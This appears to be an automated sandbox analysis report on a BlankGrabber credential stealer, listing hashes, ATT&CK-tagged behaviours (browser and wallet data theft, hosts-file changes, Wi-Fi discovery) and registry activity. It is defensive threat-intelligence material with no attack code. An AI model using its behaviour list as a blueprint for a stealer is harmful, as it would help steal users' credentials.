Malware Analysis Report

2024-11-15 09:53

Sample ID 241109-drjrtsvrb1
Target spoofedV2.exe
SHA256 e9dbb65873885de12d31b6087a300a03d23eca8af63dd7b1b72927ad11406ea1
Tags
blankgrabber upx collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e9dbb65873885de12d31b6087a300a03d23eca8af63dd7b1b72927ad11406ea1

Threat Level: Known bad

The file spoofedV2.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber upx collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Clipboard Data

Executes dropped EXE

Modifies system executable filetype association

Reads user/profile data of web browsers

Event Triggered Execution: Component Object Model Hijacking

Unsecured Credentials: Credentials In Files

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

UPX packed file

Enumerates processes with tasklist

Hide Artifacts: Hidden Files and Directories

Drops file in Windows directory

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

System Location Discovery: System Language Discovery

Modifies Internet Explorer settings

Views/modifies file attributes

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Gathers system information

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Runs ping.exe

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Detects videocard installed

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 03:14

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 03:14

Reported

2024-11-09 03:17

Platform

win7-20240708-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI24842\python311.dll

MD5 1e76961ca11f929e4213fca8272d0194
SHA1 e52763b7ba970c3b14554065f8c2404112f53596
SHA256 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0
SHA512 ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

memory/2836-23-0x000007FEF5F60000-0x000007FEF654A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 03:14

Reported

2024-11-09 03:18

Platform

win11-20241007-en

Max time kernel

210s

Max time network

211s

Command Line

"C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133755957735794554" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\odopen\shell C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\VersionIndependentProgID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ = "IDeviceHeroShotCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ = "ISyncInformationLookupCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ = "ISyncEngineOcsi" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\odopen\DefaultIcon C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\FileSyncClient.AutoPlayHandler.1 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ = "IFileSyncClient4" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ = "IItemActivityCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32\ = "{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\FileSyncClient.AutoPlayHandler\ = "FileSyncClient AutoPlayHandler Class" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ = "IGetSelectiveSyncInformationCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\OOBERequestHandler.OOBERequestHandler.1 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\0\win64\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ = "IDeviceHeroShotCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Directory\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\AppID\OneDrive.EXE C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ProgID\ = "SyncEngineFileInfoProvider.SyncEngineFileInfoProvider.1" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
